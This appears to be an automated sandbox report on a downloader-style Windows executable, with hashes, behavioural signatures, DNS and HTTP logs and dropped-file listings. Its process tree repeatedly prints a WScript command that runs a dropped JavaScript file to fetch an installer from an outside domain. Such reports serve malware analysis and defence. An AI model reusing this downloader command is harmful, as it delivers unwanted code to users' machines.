Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

17d5ceebf1...18.exe

windows7-x64

8

17d5ceebf1...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    05/05/2024, 13:12 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    17d5ceebf106e989b0b4cabcdb9123dc

  • SHA1

    95f7aabc5cbc6541160dcec0268dd89b3bf37099

  • SHA256

    1d21f633b5beec96b5a777690fbbb3e4f1e2f766a9282dcce967c1100e654ccc

  • SHA512

    f6cbaa4c343922aafb9499c2f58c5f399a8cfaa7d8e3a3dab96bdd3b3a0ddcb5a7c9512c1d731097a48fbbbd3fecf5a9b00e244875b90c356f95ec9dd6fb5271

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO35m:/7BSH8zUB+nGESaaRvoB7FJNndnam

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2224
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
      2⤵
      • Blocklisted process makes network request
      PID:2944
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
      2⤵
      • Blocklisted process makes network request
      PID:2600
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
      2⤵
      • Blocklisted process makes network request
      PID:2708
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
      2⤵
      • Blocklisted process makes network request
      PID:2020
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
      2⤵
      • Blocklisted process makes network request
      PID:1508

Network

  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-2.hugedomains.com
    traff-2.hugedomains.com
    IN CNAME
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.253.23
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.204.160
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 05 May 2024 13:12:26 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    172.67.70.191
    www.hugedomains.com
    IN A
    104.26.6.37
    www.hugedomains.com
    IN A
    104.26.7.37
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    172.67.70.191:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 05 May 2024 13:12:27 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: site_version_phase=108; expires=Wed, 30-Apr-2025 13:12:27 GMT; path=/
    set-cookie: site_version=HDv3; expires=Wed, 30-Apr-2025 13:12:27 GMT; path=/
    set-cookie: captcha-tracker=; expires=Sat, 04-May-2024 13:12:27 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMPHyKg2QhhJdGy%2FxUIWtgMpdWSLKi6GKxByIk9LDvS29iy2AnuUfFVv5sOYS0IXC0Wn6nYYsgdJKHGhUafHUgPut2QT0y6WiH3D%2FtKqb2IGDqffFasasq3W%2B%2BGH9jNbKfG4i48%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 87f0fb752d9f9539-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 05 May 2024 13:12:33 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    172.67.70.191:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 05 May 2024 13:12:34 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Sat, 04-May-2024 13:12:34 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inokXRAznajwfase668SQkHokFGkMDY%2B8jHqm9XfdZ1l2Ceff9Y8GdxuYjaf%2B8oZ3jv%2FVu7sS4Zn03Es%2FD2JE9K8FrawCgA%2FyrOH2uXGRXumGqbTZxKUcV1zqH4A3DlGOmqb6d8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 87f0fb9dcc79653c-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 05 May 2024 13:12:39 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    172.67.70.191:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 05 May 2024 13:12:40 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Sat, 04-May-2024 13:12:40 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uT1VKPjtli%2BVf9XTIsWstLQW2klhyIzZeUciNlPy0GD7hjgYZLLbIyoCk2US0mGRWC3SDJ5dbcOpsJErga21QzwXkCXg1eCW%2FvZ8e5vBzRQbPYIr37JJDM%2BQkY7b88mUFHavgIk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 87f0fbc4cbe8385e-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 05 May 2024 13:12:45 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    172.67.70.191:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 05 May 2024 13:12:46 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Sat, 04-May-2024 13:12:46 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0YDcXTkH6MrO%2Bs1dSN10NGtiSn429auOzAtxiKoGh0Qflhbfg3CARjXKYwapS3drlcprKtMMdnboGFfP9b%2FOcB%2FLYJyilH9o%2FkuEdoXFMDKFj0TK1YWLGuIiieodcd4sjDixcnI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 87f0fbeb6fa19497-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 05 May 2024 13:12:51 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    172.67.70.191:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 05 May 2024 13:12:53 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CUC4Bct%2BopNiCAk5kCIrpNSg%2Bv%2BuqJTJrIK9nRL7VzM6XaIQiBEKUGdVq5xnC10I86e%2BRKAWOe%2BGJTZoRW4rSQAxMmmCm76b6AVWvdVkXZMK1rtHWGZVAXN2BryAOG%2F5LxtaqPA%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 87f0fc13bb639505-LHR
    Content-Encoding: gzip
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 172.67.70.191:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     9.5kB
     13
    14

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    656 B
     239 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 172.67.70.191:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     9.2kB
     11
    14

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 172.67.70.191:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     9.2kB
     12
    14

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 172.67.70.191:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
     9.1kB
     11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 172.67.70.191:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.5kB
     16.3kB
     15
    20

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
     139 B
     1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
     191 B
     1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    3.130.253.23
    3.130.204.160

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    65 B
     113 B
     1
    1

    DNS Request

    www.hugedomains.com

    DNS Response

    172.67.70.191
    104.26.6.37
    104.26.7.37

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    1KB

    MD5

    ed89e34d7155c15ba34b2e8037f052fb

    SHA1

    45f90ed3c32a2e46361e9f5af26c61827dcceabd

    SHA256

    939a7f0780a999f6f67b3a64c5811946b1ee416d1b9cd4dba9d52f1d6ab787f9

    SHA512

    507c61186bc691e01fdbba126bfb6eb69d8e83027e83b50604992ebc4233d37f1e37737f264b3951486f660e0add1bfca75274808ed7bc87481ab6ce72e6c160

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    410B

    MD5

    cb9ea2cbd4de3885756224f7f49adc3d

    SHA1

    d5fba5186f6f2d4d75601824ab294f1935b29b1e

    SHA256

    a5cf9fb4ac3a3520a0df020ebefcd941761b9f1680160551df438894a86a43f7

    SHA512

    db8ad00fac22bf1bf500542b5a043d2603ee204eb7c5e2769204aa8ce16dc24799446df88746eaa1d68ec221e4585d098b7b5b6e09bdf976510a01729a64e17a

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    9a22f09f1e2acdb6f3076f006c42c46a

    SHA1

    70a7326f9396a9a43e5bfab33c29d119d7f53def

    SHA256

    22bcf2697cd35595cdcd4cc3181b08be96392f43028ab1de93b4f1a2f0b36651

    SHA512

    334ab5ac1b083679610ed33fc699a46f981231a7eed2cbfd9797bf624dda9bd1f4b78a0f623a42ff69c7e6695f199549934669d0d4292beade3bb1a5ffdced2f

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
    Filesize

    392B

    MD5

    398080927005341e227f8f189545e304

    SHA1

    fb7ceb34d8301799e9b0640fdf20864f2a1f2237

    SHA256

    95eae0b153190a66991d7c6c58a902c21abd1a33ac1aff3acc92741654e72b4d

    SHA512

    577db8a22a59080c4f8bb28d752fa04801c18fe7340f2b8f8759c2752d13317868762125c9159bda3896f31a115c071f5f20518c08719af3d271a2bde33e1f9b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
    Filesize

    6KB

    MD5

    41cdb18ce288b8ca6ab835c100dddf4c

    SHA1

    8a75f5b6c11f075986a76f316478877c53e4d401

    SHA256

    10f02727adc3c3f1175296f1149e2cc84ebef4a010e2845e5b4fb75d37a8166e

    SHA512

    7fa3fc2040730c5dc15b50ddcf940d6d3dcd73fcf35e42812bcdf52145c14b69e751de74b8b18a3880d07e14a65f75377c4392888de701972ce7347023b410aa

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
    Filesize

    6KB

    MD5

    ab657802cb2f6d3449cd2ea281e3fe22

    SHA1

    55b1104f8d62a37319e8b02f902ed52df6474499

    SHA256

    c7ec418d4335d226d451f704b7b15a62861ef5ad54d273064b76ce080e6f5239

    SHA512

    8f19ece709d4c54462777a6550f0444002203cec22a8e9d613c2928ab1e3bf3dff6890e7b6bedf6dc4e1ccc5b6b4ac530177a2d1ba2d6c6fb18a672aac8d594c

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm
    Filesize

    6KB

    MD5

    89e38ff0cefb93b093d5c02145a7d456

    SHA1

    28215486c89a26bb511145e95a95d4976620ec1b

    SHA256

    92f7ac5e76e636fac3804bc7a5875a7ee21d290ac7cb47b7a4c2f60bf1723b6c

    SHA512

    16b9cb4b875a6b2294702981094943ede45d7b0d82d08d27025572180908856e187c7e87c182c3bf9f251093757bc8fefd94a818c35af774405a0db85f3a90a8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm
    Filesize

    6KB

    MD5

    ee637eea5e9b4c4b8298465c29841b79

    SHA1

    eda8f6569bde469ce073cb9f819f90ed57223fff

    SHA256

    fc23967651d6176e21c1b384c96b5a4400a9d7ef4a1303accb66f16ada7f2bf4

    SHA512

    1e9906bc00633d8ecc13321e830923ad1fbb72b449e637b6c1719b31a17dd1e8904cac1eedfb6b9974cc927f4ec8858fd244fabcb6070ff34c9e643f54b48f67

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab589B.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar70FC.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\fuf28E4.js
    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HS8OTRM6.txt
    Filesize

    177B

    MD5

    950d1ffa74a7d989a73633b251d1d9f1

    SHA1

    9f5e6fb7ce325b2b7d62ffa4489b1caee2c92cce

    SHA256

    ebd370e737af01c71af95017472780b2125eb779bf930e3bd3ab733f3f105e59

    SHA512

    58f6dd1c650475aa46f9065d3fa7162b903f0226e4e6a106a7ba195b4c5a558bf110156fd704cbafa76c9cd24244f2e4bc8f581ef05d95ddb0959360334443a9

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.